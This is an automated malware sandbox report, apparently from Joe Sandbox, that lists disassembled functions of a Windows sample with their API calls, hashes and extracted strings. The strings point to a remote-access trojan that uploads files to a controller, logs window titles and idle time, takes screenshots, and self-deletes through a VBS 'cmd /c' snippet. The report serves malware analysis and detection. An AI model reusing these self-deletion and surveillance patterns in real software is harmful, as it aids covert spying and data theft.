                                                                                                                                                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                                                                                                                                                            • Opcode ID: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                                                                                                                                                                                                            • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                                                                                                                                            Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3899193279-0
                                                                                                                                                                                                                                            • Opcode ID: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                                                                                                                                                                            • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                                                                                                                                            Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                                                                            • API String ID: 1223786279-3931108886
                                                                                                                                                                                                                                            • Opcode ID: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                                                                                                                                                                                                            • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                                                                                                                                                                                                            Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                                                                            • API String ID: 2490988753-744132762
                                                                                                                                                                                                                                            • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                                                                                                                                            • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                                                                                                                                            Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                                                            • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                                                                                                                                            • API String ID: 911427763-1497357211
                                                                                                                                                                                                                                            • Opcode ID: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                                                                                                                                                                                                            • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                                                                                                                                            Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                                                                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                                                                            • String ID: Close
                                                                                                                                                                                                                                            • API String ID: 1657328048-3535843008
                                                                                                                                                                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                            • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                                                                                                                                            Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2509303402-0
                                                                                                                                                                                                                                            • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                            • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                                                                                                                                            Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                                                                            • API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                            • Opcode ID: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                                                                            • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                                                                                                                                            Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                                            • Opcode ID: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                                                                            • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                                                                                                                                            Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500B6
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500D8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500ED
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500F8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045011A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045012D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045013B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00450146
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045017E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00450185
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004501A2
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004501BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                            • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                                                                                                                                            Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                                                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                                                                            • API String ID: 489098229-65789007
                                                                                                                                                                                                                                            • Opcode ID: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
                                                                                                                                                                                                                                            • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                                                                                                                                            Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                                                            • API String ID: 994465650-2151626615
                                                                                                                                                                                                                                            • Opcode ID: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                                                                                                                                                                                                            • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                                                                                                                                                                                                                            Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
